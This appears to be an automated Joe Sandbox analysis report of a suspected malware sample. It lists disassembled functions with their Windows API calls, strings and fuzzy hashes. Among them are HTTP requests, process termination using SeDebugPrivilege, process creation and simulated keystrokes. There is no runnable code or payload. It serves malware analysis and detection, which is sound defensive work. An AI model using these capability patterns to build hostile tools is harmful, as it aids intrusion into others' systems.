SelectObject.GDI32(00000000,00000000), ref: 006CCD53
SelectObject.GDI32(00000000,00000000), ref: 006CCD68
ReleaseDC.USER32(?,00000000), ref: 006CCD70
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 006CCDFB

Strings

U, xrefs: 006CCCD0

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 7d22232d72cb259713bbf59b836cce2fecdfbe4e729aee86c15e9c48264a27e5
Instruction ID: e378ebc4df6fb053eac382d41150bce9131d5d75e825cf8abfc8d3b7885c10bf
Opcode Fuzzy Hash: 7d22232d72cb259713bbf59b836cce2fecdfbe4e729aee86c15e9c48264a27e5
Instruction Fuzzy Hash: DF71A231500205EFCF218F64C894EFA7BB6FF49320F14826EED5A5A2A6D7309891DB60

Function 00701A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00701A50
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00701A7C
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00701ABE
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00701AD3
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00701AE0
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00701B10
InternetCloseHandle.WININET(00000000), ref: 00701B57

Part of subcall function 00702483: GetLastError.KERNEL32(?,?,00701817,00000000,00000000,00000001), ref: 00702498
Part of subcall function 00702483: SetEvent.KERNEL32(?,?,00701817,00000000,00000000,00000001), ref: 007024AD

Strings

, xrefs: 00701B01

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
String ID:
API String ID: 2603140658-3916222277
Opcode ID: 8e8bdba6c0ef2cb5ce04b8e5a7d6db5747c276378063cc8e3dac04f70e30d4c4
Instruction ID: 0d98623e5f9e6f8015bc73bf82563328a1a354c8b4fa23a6fe59d2e118005d23
Opcode Fuzzy Hash: 8e8bdba6c0ef2cb5ce04b8e5a7d6db5747c276378063cc8e3dac04f70e30d4c4
Instruction Fuzzy Hash: 98414FB1501218FFEB129F64CC89FFA77ACEB08354F408226F9059A1C1E7789E449BA4

Function 00708C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,0071F910), ref: 00708D28
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0071F910), ref: 00708D5C
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00708ED6
SysFreeString.OLEAUT32(?), ref: 00708F00

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: c1e436f4743a31613baf3372ffd4c8badf65dea07a47bb7b8587f55fc85f4a78
Instruction ID: 35793ca80dd6b0994b4d625e73f4cf55a27757bdac69523e503a2b46c6e1fe60
Opcode Fuzzy Hash: c1e436f4743a31613baf3372ffd4c8badf65dea07a47bb7b8587f55fc85f4a78
Instruction Fuzzy Hash: 13F17C71A00209EFDF44DF94C884EAEB7BAFF48314F108198F945AB291DB35AE45CB61

Function 0070F694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0070F6B5
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0070F848
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0070F86C
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0070F8AC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0070F8CE
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0070FA4A
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0070FA7C
CloseHandle.KERNEL32(?), ref: 0070FAAB
CloseHandle.KERNEL32(?), ref: 0070FB22

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: b7b562134f730df1746263e2908f01133a46c69fb6dba7baa527cd1d844b7cc6
Instruction ID: 9643f066e4f98d4858f611989c38abe196314d7a9e27ec55b850e11d10333934
Opcode Fuzzy Hash: b7b562134f730df1746263e2908f01133a46c69fb6dba7baa527cd1d844b7cc6
Instruction Fuzzy Hash: 58E1B071204301DFCB64EF24C891A6ABBE6AF85314F14866DF8998B6E1CB35EC41CB56

Function 006F4CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 006F466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,006F3697,?), ref: 006F468B

Part of subcall function 006F466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,006F3697,?), ref: 006F46A4

Part of subcall function 006F4A31: GetFileAttributesW.KERNEL32(?,006F370B), ref: 006F4A32

lstrcmpiW.KERNEL32(?,?), ref: 006F4D40
_wcscmp.LIBCMT ref: 006F4D5A
MoveFileW.KERNEL32(?,?), ref: 006F4D75

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: dad6b095306be9c77c36dd410d5bccbbcbc751ac61d220976578da79d227f18a
Instruction ID: 401ff29607110f97c21a0758dca5e31afc064dfde43a78ce7f49d8f9a7633b67
Opcode Fuzzy Hash: dad6b095306be9c77c36dd410d5bccbbcbc751ac61d220976578da79d227f18a
Instruction Fuzzy Hash: E5518AB21083895BC765DB64D881DEF73EDAF85350F00492EF289D3551EF34A688C75A

Function 00718645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 007186FF

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 47deb86b98c3ba13f25a893b9da4e01e57475f7f016c51c57f762c493629e5a4
Instruction ID: 8cf7a9bb5d7cd47c1fd167aa6c0458f13d4dcdcbd83a4a407073c14bd28041c7
Opcode Fuzzy Hash: 47deb86b98c3ba13f25a893b9da4e01e57475f7f016c51c57f762c493629e5a4
Instruction Fuzzy Hash: 2751AF30510244BEEFA09B6CCC89FE93BA5AB05720F704216F910E61E1DB7DE9C0CB56

Function 00692B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 006CC2F7
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 006CC319
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 006CC331
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 006CC34F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 006CC370
DestroyIcon.USER32(00000000), ref: 006CC37F
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 006CC39C
DestroyIcon.USER32(?), ref: 006CC3AB

Part of subcall function 0071A4AF: DeleteObject.GDI32(00000000), ref: 0071A4E8

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: 873130f321b8de9a356ce005524e92646a66594d2ae39181f6b051b2fc1f1f0b
Instruction ID: 98753c2df33356369a25b3919813a23783362371f639bde429927c2509a2b55b
Opcode Fuzzy Hash: 873130f321b8de9a356ce005524e92646a66594d2ae39181f6b051b2fc1f1f0b
Instruction Fuzzy Hash: B7514A70600206EFDF20DF68DC55FAA37EAEB54320F10852DF90697690D7B4A991DB94

Function 006E966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 006EA82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 006EA84C
Part of subcall function 006EA82C: GetCurrentThreadId.KERNEL32 ref: 006EA853
Part of subcall function 006EA82C: AttachThreadInput.USER32(00000000,?,006E9683,?,00000001), ref: 006EA85A

MapVirtualKeyW.USER32(00000025,00000000), ref: 006E968E
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 006E96AB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 006E96AE
MapVirtualKeyW.USER32(00000025,00000000), ref: 006E96B7
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 006E96D5
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 006E96D8
MapVirtualKeyW.USER32(00000025,00000000), ref: 006E96E1
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 006E96F8
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 006E96FB

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 1a2cf19ab4f7bc533ca2fd7d369353b1c126091834afe0db377ae7aa8b1fceb5
Instruction ID: efacb8d2abcd5229bade6793797296b6d5fc66a0896001e4fc1bde93e34ef366
Opcode Fuzzy Hash: 1a2cf19ab4f7bc533ca2fd7d369353b1c126091834afe0db377ae7aa8b1fceb5
Instruction Fuzzy Hash: DE11E571910618BEF6106F65DC49FAA3F1EEB4C750F108429F244AB0E0C9F25C10DAB8

Function 006E8921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,006E853C,00000B00,?,?), ref: 006E892A
HeapAlloc.KERNEL32(00000000,?,006E853C,00000B00,?,?), ref: 006E8931
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,006E853C,00000B00,?,?), ref: 006E8946
GetCurrentProcess.KERNEL32(?,00000000,?,006E853C,00000B00,?,?), ref: 006E894E
DuplicateHandle.KERNEL32(00000000,?,006E853C,00000B00,?,?), ref: 006E8951
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,006E853C,00000B00,?,?), ref: 006E8961
GetCurrentProcess.KERNEL32(006E853C,00000000,?,006E853C,00000B00,?,?), ref: 006E8969
DuplicateHandle.KERNEL32(00000000,?,006E853C,00000B00,?,?), ref: 006E896C
CreateThread.KERNEL32(00000000,00000000,006E8992,00000000,00000000,00000000), ref: 006E8986

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: e8ae9ebe34fe32be535aef3ff64b86083e17cb8c95a294794d22471bf1e547ea
Instruction ID: 12d7008a925920e7139f5068b770cb4378d4960bd45147a4237b3a15519c2560
Opcode Fuzzy Hash: e8ae9ebe34fe32be535aef3ff64b86083e17cb8c95a294794d22471bf1e547ea
Instruction Fuzzy Hash: 7401ACB5640348FFE610ABA9DC49FAB3B6DEB89711F41C421FA05DB191CA749C009A24

Function 00709B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 00709B7B
NULL Pointer assignment, xrefs: 00709BA4, 00709EC8

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 4de7dd421ddf1df6062a553b5ca1a9e1b60484cb31be2a8ed54749064899fc44
Instruction ID: 4deab19170bfd62a331397ef0d6809a76034e213ca61ada0b26a264dfc760885
Opcode Fuzzy Hash: 4de7dd421ddf1df6062a553b5ca1a9e1b60484cb31be2a8ed54749064899fc44
Instruction Fuzzy Hash: 3DC172B1A00219DBDF10DF68D884AAEB7F5FB48314F148669EA05A72C2E774AD45CB60

Function 0070975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 006E710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006E7044,80070057,?,?,?,006E7455), ref: 006E7127
Part of subcall function 006E710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006E7044,80070057,?,?), ref: 006E7142
Part of subcall function 006E710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006E7044,80070057,?,?), ref: 006E7150
Part of subcall function 006E710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006E7044,80070057,?), ref: 006E7160

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00709806
_memset.LIBCMT ref: 00709813
_memset.LIBCMT ref: 00709956
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00709982
CoTaskMemFree.OLE32(?), ref: 0070998D

Strings

NULL Pointer assignment, xrefs: 007099DB

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: f02c82f9f0b5ef86a9910c99dc6d1d7a31ca6fb41b20180eb30e786189364c4b
Instruction ID: ba2f941c005ef0996d195c0a7cc31e90806cb2d148b2698a7d7ac1fee75c6038
Opcode Fuzzy Hash: f02c82f9f0b5ef86a9910c99dc6d1d7a31ca6fb41b20180eb30e786189364c4b
Instruction Fuzzy Hash: 86913871D00229EBDF10DFA5DC41EDEBBB9AF48310F10815AF519A7291EB75AA44CFA0

Function 00716D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00716E24
SendMessageW.USER32(?,00001036,00000000,?), ref: 00716E38
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00716E52
_wcscat.LIBCMT ref: 00716EAD
SendMessageW.USER32(?,00001057,00000000,?), ref: 00716EC4
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00716EF2

Strings

SysListView32, xrefs: 00716DF6

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 8e34254790418f5cda614e3d56ad30441b9885aa9f5897bf79b30f74ed085240
Instruction ID: dc2724c928bb8470eb41e8d074704e8875fa6c4676cde1940b565c1e43b17fa8
Opcode Fuzzy Hash: 8e34254790418f5cda614e3d56ad30441b9885aa9f5897bf79b30f74ed085240
Instruction Fuzzy Hash: 6A419E74A00348EBDF219F68CC85BEA77E9EF08350F10452AF984A72D1D6799DC88B64

Function 0070E933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 006F3C55: CreateToolhelp32Snapshot.KERNEL32 ref: 006F3C7A
Part of subcall function 006F3C55: Process32FirstW.KERNEL32(00000000,?), ref: 006F3C88
Part of subcall function 006F3C55: CloseHandle.KERNEL32(00000000), ref: 006F3D52

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0070E9A4
GetLastError.KERNEL32 ref: 0070E9B7
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0070E9E6
TerminateProcess.KERNEL32(00000000,00000000), ref: 0070EA63
GetLastError.KERNEL32(00000000), ref: 0070EA6E
CloseHandle.KERNEL32(00000000), ref: 0070EAA3

Strings

SeDebugPrivilege, xrefs: 0070E9C2

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: a7fdbbe4d6a81622d35d56c50edac61b6a737529b6ed0b3933a05cacb448d679
Instruction ID: 78b0cf2cfa3b06736dd495b39459c9b084ed37154ee358bda4e8e31089dbcadf
Opcode Fuzzy Hash: a7fdbbe4d6a81622d35d56c50edac61b6a737529b6ed0b3933a05cacb448d679
Instruction Fuzzy Hash: AE418A713002019FDB15EF18CC95BAEB7E6AF45310F14C95CF9469B2D2DB79A804CB9A

Function 006F2F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 006F3033

Strings

blank, xrefs: 006F2FB5
question, xrefs: 006F2FEC
info, xrefs: 006F2FD4
stop, xrefs: 006F3004
warning, xrefs: 006F301C

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 2b69aef462c04bd113e4605623df869346802e51295be7788110a0cff49b278d
Instruction ID: c50a7fd48aed6e91d5e5fe04e3635a2831e61957b63fcd6b44394eb30a6cbed8
Opcode Fuzzy Hash: 2b69aef462c04bd113e4605623df869346802e51295be7788110a0cff49b278d
Instruction Fuzzy Hash: F611F37124839FBAE7549A59EC42CFF679D9F15320B20002BFA00A6381DF649F4156A5

Function 006F42F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 006F4312
LoadStringW.USER32(00000000), ref: 006F4319
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 006F432F
LoadStringW.USER32(00000000), ref: 006F4336
_wprintf.LIBCMT ref: 006F435C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 006F437A

Strings

%s (%d) : ==> %s: %s %s, xrefs: 006F4357

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: f1753738ce0b21a53c5b3e41f6fdb2a954c94b5b5a81726194d87f480b0b93b2
Instruction ID: c282b16699cdc3fe2e7a7f6dc6c7e3eae1192aec17874844d8627c4e1bdbd0e9
Opcode Fuzzy Hash: f1753738ce0b21a53c5b3e41f6fdb2a954c94b5b5a81726194d87f480b0b93b2
Instruction Fuzzy Hash: 380171F290020CBFD751A7949D89EE6766CD708300F0081A1FB05E2091EA785E854B74

Function 0071D43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00692612: GetWindowLongW.USER32(?,000000EB), ref: 00692623

GetSystemMetrics.USER32(0000000F), ref: 0071D47C
GetSystemMetrics.USER32(0000000F), ref: 0071D49C
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0071D6D7
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0071D6F5
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0071D716
ShowWindow.USER32(00000003,00000000), ref: 0071D735
InvalidateRect.USER32(?,00000000,00000001), ref: 0071D75A
